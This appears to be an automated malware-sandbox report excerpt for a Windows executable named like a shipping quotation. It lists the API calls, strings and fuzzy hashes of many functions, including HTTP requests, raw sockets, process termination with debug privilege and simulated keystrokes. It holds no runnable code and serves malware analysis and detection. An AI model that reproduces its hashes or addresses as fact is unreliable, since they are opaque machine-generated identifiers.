                                                                            • Instruction ID: 46e3d9c60edb627051499cdc7b6e32abcc40c756eb4f81eb5a8ba4d2d42f33d1
                                                                            • Opcode Fuzzy Hash: bff2d3d15a2a5d352b2da6999ca94aac420674b12dab03bbe01f391f0c6a3803
                                                                            • Instruction Fuzzy Hash: 8581AF725082459FCB24FF14C8449AAB3EABF8A310F144C6EF889D7251EB35DD498F92
                                                                            APIs
                                                                            • SetWindowLongW.USER32(?,000000EB), ref: 00635C7A
                                                                              • Part of subcall function 00635D0A: GetClientRect.USER32(?,?), ref: 00635D30
                                                                              • Part of subcall function 00635D0A: GetWindowRect.USER32(?,?), ref: 00635D71
                                                                              • Part of subcall function 00635D0A: ScreenToClient.USER32(?,?), ref: 00635D99
                                                                            • GetDC.USER32 ref: 006746F5
                                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00674708
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 00674716
                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0067472B
                                                                            • ReleaseDC.USER32(?,00000000), ref: 00674733
                                                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 006747C4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                            • String ID: U
                                                                            • API String ID: 4009187628-3372436214
                                                                            • Opcode ID: 0e2601072b06e06651135e08866effb70feb77c0907eb7f207e074ce9a559031
                                                                            • Instruction ID: 4a9fcd97c466792f1d390e0455f490e98aded9cbe6a838706f47c817c1611963
                                                                            • Opcode Fuzzy Hash: 0e2601072b06e06651135e08866effb70feb77c0907eb7f207e074ce9a559031
                                                                            • Instruction Fuzzy Hash: 3C71B031500205DFCF258F64C988AFA7BB7FF4A364F148269ED5A5A2A6CB31D842DF50
                                                                            APIs
                                                                            • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 006A35E4
                                                                            • LoadStringW.USER32(00702390,?,00000FFF,?), ref: 006A360A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: LoadString
                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                            • API String ID: 2948472770-2391861430
                                                                            • Opcode ID: c22ffadd52ee412982c324ee7ae077cc8fcf3c94253f879bfadd346cb514ba5a
                                                                            • Instruction ID: c2f44211927776a62a9184614480131dd060a022bd402991207b71798f1e8eb2
                                                                            • Opcode Fuzzy Hash: c22ffadd52ee412982c324ee7ae077cc8fcf3c94253f879bfadd346cb514ba5a
                                                                            • Instruction Fuzzy Hash: 29516171C00219BBDF55EBA0CC42EEDBB7AEF05300F549129F105722A1DB715A95DFA8
                                                                            APIs
                                                                            • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 006AC272
                                                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006AC29A
                                                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 006AC2CA
                                                                            • GetLastError.KERNEL32 ref: 006AC322
                                                                            • SetEvent.KERNEL32(?), ref: 006AC336
                                                                            • InternetCloseHandle.WININET(00000000), ref: 006AC341
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                            • String ID:
                                                                            • API String ID: 3113390036-3916222277
                                                                            • Opcode ID: c9dc4a58a20ee73a6cef10d424fb4cbcce027754a8297c19a5a0a06140abaff0
                                                                            • Instruction ID: 9e5ddf47df7acc13e32508b2b585238e5ab9977a8075b72157db0fbd2451d895
                                                                            • Opcode Fuzzy Hash: c9dc4a58a20ee73a6cef10d424fb4cbcce027754a8297c19a5a0a06140abaff0
                                                                            • Instruction Fuzzy Hash: 7E316DB1500204AFDB21AF648888EBB7AFEEF4A764F14851EF44A92200DB34DD059F70
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00673AAF,?,?,Bad directive syntax error,006CCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 006998BC
                                                                            • LoadStringW.USER32(00000000,?,00673AAF,?), ref: 006998C3
                                                                            • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00699987
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadMessageModuleString
                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                            • API String ID: 2734547477-4153970271
                                                                            • Opcode ID: 70fecf94ee5d13b8861e48db8325286ae63d2e39bffadf112c1b3cd2ae123419
                                                                            • Instruction ID: 5fdc816176ab9951a6c420078564134e83f25f8d3b306cd72157f60e29a858a6
                                                                            • Opcode Fuzzy Hash: 70fecf94ee5d13b8861e48db8325286ae63d2e39bffadf112c1b3cd2ae123419
                                                                            • Instruction Fuzzy Hash: 30213C3284021AABDF15AF90CC06EEE777AFF18300F049459F519661A2EA719618DB64
                                                                            APIs
                                                                            • GetParent.USER32 ref: 006920AB
                                                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 006920C0
                                                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0069214D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.11156145764.0000000000631000.00000020.00000001.01000000.00000003.sdmp, Offset: 00630000, based on PE: true
                                                                            • Associated: 00000000.00000002.11156120017.0000000000630000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006CC000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156284420.00000000006F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156371631.00000000006FC000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.11156404076.0000000000704000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_630000_QUOTATION#070125-ELITE MARINE .jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameParentSend
                                                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                            • API String ID: 1290815626-3381328864
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 006C5186
                                                                            • ShowWindow.USER32(?,00000000), ref: 006C51C7
                                                                            • ShowWindow.USER32(?,00000005,?,00000000), ref: 006C51CD
                                                                            • SetFocus.USER32(?,?,00000005,?,00000000), ref: 006C51D1
                                                                              • Part of subcall function 006C6FBA: DeleteObject.GDI32(00000000), ref: 006C6FE6
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 006C520D
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 006C521A
                                                                            • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 006C524D
                                                                            • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 006C5287
                                                                            • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 006C5296
                                                                            Similarity
                                                                            • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                            • String ID:
                                                                            • API String ID: 3210457359-0
                                                                            APIs
                                                                            • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00686890
                                                                            • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 006868A9
                                                                            • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 006868B9
                                                                            • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 006868D1
                                                                            • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 006868F2
                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00648874,00000000,00000000,00000000,000000FF,00000000), ref: 00686901
                                                                            • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0068691E
                                                                            • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00648874,00000000,00000000,00000000,000000FF,00000000), ref: 0068692D
                                                                            Similarity
                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                            • String ID:
                                                                            • API String ID: 1268354404-0
                                                                            APIs
                                                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 006AC182
                                                                            • GetLastError.KERNEL32 ref: 006AC195
                                                                            • SetEvent.KERNEL32(?), ref: 006AC1A9
                                                                              • Part of subcall function 006AC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 006AC272
                                                                              • Part of subcall function 006AC253: GetLastError.KERNEL32 ref: 006AC322
                                                                              • Part of subcall function 006AC253: SetEvent.KERNEL32(?), ref: 006AC336
                                                                              • Part of subcall function 006AC253: InternetCloseHandle.WININET(00000000), ref: 006AC341
                                                                            Similarity
                                                                            • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                            • String ID:
                                                                            • API String ID: 337547030-0
                                                                            APIs
                                                                              • Part of subcall function 00693A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00693A57
                                                                              • Part of subcall function 00693A3D: GetCurrentThreadId.KERNEL32 ref: 00693A5E
                                                                              • Part of subcall function 00693A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,006925B3), ref: 00693A65
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 006925BD
                                                                            • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 006925DB
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 006925DF
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 006925E9
                                                                            • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00692601
                                                                            • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00692605
                                                                            • MapVirtualKeyW.USER32(00000025,00000000), ref: 0069260F
                                                                            • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00692623
                                                                            • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00692627
                                                                            Similarity
                                                                            • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                            • String ID:
                                                                            • API String ID: 2014098862-0
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00691449,?,?,00000000), ref: 0069180C
                                                                            • HeapAlloc.KERNEL32(00000000,?,00691449,?,?,00000000), ref: 00691813
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00691449,?,?,00000000), ref: 00691828
                                                                            • GetCurrentProcess.KERNEL32(?,00000000,?,00691449,?,?,00000000), ref: 00691830
                                                                            • DuplicateHandle.KERNEL32(00000000,?,00691449,?,?,00000000), ref: 00691833
                                                                            • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00691449,?,?,00000000), ref: 00691843
                                                                            • GetCurrentProcess.KERNEL32(00691449,00000000,?,00691449,?,?,00000000), ref: 0069184B
                                                                            • DuplicateHandle.KERNEL32(00000000,?,00691449,?,?,00000000), ref: 0069184E
                                                                            • CreateThread.KERNEL32(00000000,00000000,00691874,00000000,00000000,00000000), ref: 00691868
                                                                            Similarity
                                                                            • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                            • String ID:
                                                                            • API String ID: 1957940570-0
                                                                            APIs
                                                                              • Part of subcall function 0069D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0069D501
                                                                              • Part of subcall function 0069D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0069D50F
                                                                              • Part of subcall function 0069D4DC: CloseHandle.KERNEL32(00000000), ref: 0069D5DC
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006BA16D
                                                                            • GetLastError.KERNEL32 ref: 006BA180
                                                                            • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006BA1B3
                                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 006BA268
                                                                            • GetLastError.KERNEL32(00000000), ref: 006BA273
                                                                            • CloseHandle.KERNEL32(00000000), ref: 006BA2C4
                                                                            Similarity
                                                                            • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                            • String ID: SeDebugPrivilege
                                                                            • API String ID: 2533919879-2896544425
                                                                            APIs
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0069BCFD
                                                                            • IsMenu.USER32(00000000), ref: 0069BD1D
                                                                            • CreatePopupMenu.USER32 ref: 0069BD53
                                                                            • GetMenuItemCount.USER32(00DC9AD8), ref: 0069BDA4
                                                                            • InsertMenuItemW.USER32(00DC9AD8,?,00000001,00000030), ref: 0069BDCC
                                                                            Similarity
                                                                            • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                            • String ID: 0$2
                                                                            • API String ID: 93392585-3793063076
                                                                            APIs
                                                                            • LoadIconW.USER32(00000000,00007F03), ref: 0069C913
                                                                            Similarity
                                                                            • API ID: IconLoad
                                                                            • String ID: blank$info$question$stop$warning
                                                                            • API String ID: 2457776203-404129466
                                                                            APIs
                                                                              • Part of subcall function 00649BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00649BB2
                                                                            • GetSystemMetrics.USER32(0000000F), ref: 006C9FC7
                                                                            • GetSystemMetrics.USER32(0000000F), ref: 006C9FE7
                                                                            • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 006CA224
                                                                            • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 006CA242
                                                                            • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 006CA263
                                                                            • ShowWindow.USER32(00000003,00000000), ref: 006CA282
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 006CA2A7
                                                                            • DefDlgProcW.USER32(?,00000005,?,?), ref: 006CA2CA
                                                                            Similarity
                                                                            • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                            • String ID:
                                                                            • API String ID: 1211466189-0
                                                                            • Opcode ID: 6b4e0b4474892f7c7c89cd98d0a8dafd810398ff25992451f73b34cf367091ed
                                                                            • Instruction ID: f9bebb533f3e5b7a6974850dec07c5d6a1e1f123d38c6484f24dfe1a7ac39410
                                                                            • Opcode Fuzzy Hash: 6b4e0b4474892f7c7c89cd98d0a8dafd810398ff25992451f73b34cf367091ed
                                                                            • Instruction Fuzzy Hash: 15B18931600229DBDF14CFA8C989BFA7BB2FF44715F088169EC499B295D735AA40CB61
                                                                            APIs
                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0068682C,00000004,00000000,00000000), ref: 0064F953
                                                                            • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0068682C,00000004,00000000,00000000), ref: 0068F3D1
                                                                            • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0068682C,00000004,00000000,00000000), ref: 0068F454
                                                                            Similarity
                                                                            • API ID: ShowWindow
                                                                            • String ID:
                                                                            • API String ID: 1268545403-0
                                                                            • Opcode ID: f752b948b5f0a7d363791f69fb70008c58e75927954bb2bc6ddec018ef91e1cc
                                                                            • Instruction ID: abd0a3b6dc99e454293448b08fc25e6400fb6f8b56cfe21c1a5da34b5612c567
                                                                            • Opcode Fuzzy Hash: f752b948b5f0a7d363791f69fb70008c58e75927954bb2bc6ddec018ef91e1cc
                                                                            • Instruction Fuzzy Hash: 1A411831618680FFD7399F298888BBA7BD3AF56324F18553DF08B56761C732A881CB51
                                                                            APIs
                                                                            • DeleteObject.GDI32(00000000), ref: 006C2D1B
                                                                            • GetDC.USER32(00000000), ref: 006C2D23
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 006C2D2E
                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 006C2D3A
                                                                            • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 006C2D76
                                                                            • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 006C2D87
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,006C5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 006C2DC2
                                                                            • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 006C2DE1
                                                                            Similarity
                                                                            • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                            • String ID:
                                                                            • API String ID: 3864802216-0
                                                                            • Opcode ID: 7f3a60a584ee969e569eb97cde8590baa53adab3ff5313f5d043aeb0ab39e46c
                                                                            • Instruction ID: c67d87e1f323b139a633731e6526b666f13d443d98f5f682196e4add910d8408
                                                                            • Opcode Fuzzy Hash: 7f3a60a584ee969e569eb97cde8590baa53adab3ff5313f5d043aeb0ab39e46c
                                                                            • Instruction Fuzzy Hash: E3319C72201214BFEB118F50CC8AFFB3BAAEF19721F084055FE099A291C6759C41CBA4
                                                                            Strings
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: NULL Pointer assignment$Not an Object type
                                                                            • API String ID: 0-572801152
                                                                            • Opcode ID: 2ac016838edbe968133b701c8bcf1379a435e091ad116ecaf93b286dd3b75fda
                                                                            • Instruction ID: 985d988988ad5b51c8869cc1df8afe3048e5c1780ea906f79f173cc0fc23c9b2
                                                                            • Opcode Fuzzy Hash: 2ac016838edbe968133b701c8bcf1379a435e091ad116ecaf93b286dd3b75fda
                                                                            • Instruction Fuzzy Hash: 91D19FB1A0060A9FDF14DF98C881BEEB7B6BF48354F148069E916AB381E771DD85CB50
                                                                            Strings
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .e
                                                                            • API String ID: 0-2491337497
                                                                            • Opcode ID: ec6363349a0c34fa68f0190584cc882fc0bb761c3d5069ab2c313c72d16dea80
                                                                            • Instruction ID: 3bd2fac480c31893b367b5fec667486647f63aa87dc0e4ee0aae947277e174a9
                                                                            • Opcode Fuzzy Hash: ec6363349a0c34fa68f0190584cc882fc0bb761c3d5069ab2c313c72d16dea80
                                                                            • Instruction Fuzzy Hash: 69C1D1B4A04249EFDF11DFA8D841BEDBBB6AF09310F14429DE815A7392CB349942CB75
                                                                            APIs
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: Variant$ClearInit
                                                                            • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                            • API String ID: 2610073882-625585964
                                                                            • Opcode ID: 683db78ac6c50c49e6bd31355d940bece0a78e3df1aece5e51da2f92dc2a15d3
                                                                            • Instruction ID: 0baaa058638b39449a84328d5db74abd84df8d007de2deb04f3f6b0095e26203
                                                                            • Opcode Fuzzy Hash: 683db78ac6c50c49e6bd31355d940bece0a78e3df1aece5e51da2f92dc2a15d3
                                                                            • Instruction Fuzzy Hash: FF9176B1A00215ABDF24CF65C844FEE7BBAEF46714F10855DF505AB282DB709985CF90
                                                                            APIs
                                                                            • SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 006A125C
                                                                            • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 006A1284
                                                                            • SafeArrayUnaccessData.OLEAUT32(00000001), ref: 006A12A8
                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 006A12D8
                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 006A135F
                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 006A13C4
                                                                            • SafeArrayAccessData.OLEAUT32(00000001,?), ref: 006A1430
                                                                            Similarity
                                                                            • API ID: ArraySafe$Data$Access$UnaccessVartype
                                                                            • String ID:
                                                                            • API String ID: 2550207440-0
                                                                            • Opcode ID: 56d18bcad83d5cd64f5618a7808a897077e2a0884851133810e9141672c8638c
                                                                            • Instruction ID: 2f64bcce522382f5a283911503e7aeda328f69d08be59daed31a6d1538200821
                                                                            • Opcode Fuzzy Hash: 56d18bcad83d5cd64f5618a7808a897077e2a0884851133810e9141672c8638c
                                                                            • Instruction Fuzzy Hash: 75919E719002099FDB40AF98C885BBEB7F6FF46325F148029E541EB291D774AD41CF94
                                                                            Similarity
                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                            • String ID:
                                                                            • API String ID: 3225163088-0
                                                                            • Opcode ID: 2e6ce1df52bf2cf5c50c18e9b8ba03639b864dc5da700e45673e3ae0d0734811
                                                                            • Instruction ID: 27c0d4f6a45310135206db172cec6607e05003279b23f5d713897712e47c2924
                                                                            • Opcode Fuzzy Hash: 2e6ce1df52bf2cf5c50c18e9b8ba03639b864dc5da700e45673e3ae0d0734811
                                                                            • Instruction Fuzzy Hash: C4912671D40219EFCB14CFA9CC84AEEBBBAFF49320F248159E515B7251D375AA42CB60
                                                                            APIs
                                                                            • IsWindow.USER32(00DC9D08), ref: 006C7F37
                                                                            • IsWindowEnabled.USER32(00DC9D08), ref: 006C7F43
                                                                            • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 006C801E
                                                                            • SendMessageW.USER32(00DC9D08,000000B0,?,?), ref: 006C8051
                                                                            • IsDlgButtonChecked.USER32(?,?), ref: 006C8089
                                                                            • GetWindowLongW.USER32(00DC9D08,000000EC), ref: 006C80AB
                                                                            • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 006C80C3
                                                                            Similarity
                                                                            • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                            • String ID:
                                                                            • API String ID: 4072528602-0
                                                                            • Opcode ID: 3e6b7cd7ae394655172ebed7779be348bae8a453053b7300ddeaebc804cda4ee
                                                                            • Instruction ID: 77d0f1704886c4a2880c1090578c6a2c25656844ab7acde5f2426ff526f78143
                                                                            • Opcode Fuzzy Hash: 3e6b7cd7ae394655172ebed7779be348bae8a453053b7300ddeaebc804cda4ee
                                                                            • Instruction Fuzzy Hash: D8717774608244AFEB219F64C8D4FFABBBAEF09340F14409DE965973A1CB31A845DF60
                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 0069AEF9
                                                                            • GetKeyboardState.USER32(?), ref: 0069AF0E
                                                                            • SetKeyboardState.USER32(?), ref: 0069AF6F
                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 0069AF9D
                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 0069AFBC
                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 0069AFFD
                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 0069B020
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: f01172435494d1d9c52be9113ce2a7c0e960c72cd347995cc4f0cd3225d9fc05
                                                                            • Instruction ID: 1a58bc9beb5a705c7a9de6a29e2fc8b0607954c56b41e211fd6c9f0b98e824c3
                                                                            • Opcode Fuzzy Hash: f01172435494d1d9c52be9113ce2a7c0e960c72cd347995cc4f0cd3225d9fc05
                                                                            • Instruction Fuzzy Hash: 4651DFA0A047D53DFF3683748D49BFABEEE5B06304F089589E1D985DC2C398A8C8D791
                                                                            APIs
                                                                            • GetParent.USER32(00000000), ref: 0069AD19
                                                                            • GetKeyboardState.USER32(?), ref: 0069AD2E
                                                                            • SetKeyboardState.USER32(?), ref: 0069AD8F
                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0069ADBB
                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0069ADD8
                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0069AE17
                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0069AE38
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: 3d44e88c053cfbaf5f47588f24bb6a4b64166cac5ac40b14cd2b0a5ad55d2b14
                                                                            • Instruction ID: a8cf5443ea220622814dbb3e948f9a14d31fc91173ca60c3128664f46ee4cda6
                                                                            • Opcode Fuzzy Hash: 3d44e88c053cfbaf5f47588f24bb6a4b64166cac5ac40b14cd2b0a5ad55d2b14
                                                                            • Instruction Fuzzy Hash: 0C51E5B05047D13DFF3683A48C45BBA7EEE5F46300F088488E1D546DC2C294EC88E792
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 006C3925
                                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 006C393A
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 006C3954
                                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 006C39C6
                                                                            • SendMessageW.USER32(?,00001061,?,0000000F), ref: 006C39F4
                                                                            Strings
                                                                            Similarity
                                                                            • API ID: MessageSend$Window
                                                                            • String ID: SysListView32
                                                                            • API String ID: 2326795674-78025650
                                                                            • Opcode ID: c8644630e600642d4be5bf2d13071a3978df967e303d531e590e30a045d8a5bb
                                                                            • Instruction ID: 97794cceba19afc483ccd339241fed0a5ba08ea9f099e4d8956b0745e2e149a1
                                                                            • Opcode Fuzzy Hash: c8644630e600642d4be5bf2d13071a3978df967e303d531e590e30a045d8a5bb
                                                                            • Instruction Fuzzy Hash: 1D41A371A00219ABDF219F64CC45FFA7BAAEF08354F10452AF958E7381D775DA80CB90
                                                                            APIs
                                                                              • Part of subcall function 006B304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 006B307A
                                                                            • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 006B1112
                                                                            • WSAGetLastError.WSOCK32 ref: 006B1121
                                                                            • WSAGetLastError.WSOCK32 ref: 006B11C9
                                                                            • closesocket.WSOCK32(00000000), ref: 006B11F9
                                                                            Similarity
                                                                            • API ID: ErrorLast$closesocketinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 3854663608-0
                                                                            • Opcode ID: 076cb180292e099519fd402c0ca5df0542a60f64c4738d6f7d73b570541e621c
                                                                            • Instruction ID: 4aa907dc407fb77d828356900631aa0b987e8706b622180b3e8e46318760206a
                                                                            • Opcode Fuzzy Hash: 076cb180292e099519fd402c0ca5df0542a60f64c4738d6f7d73b570541e621c
                                                                            • Instruction Fuzzy Hash: C341D475600214AFDB109F18C894BEABBEBEF46364F548059F9199F391C770AD81CBE1
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 006C2E1C
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 006C2E4F
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 006C2E84
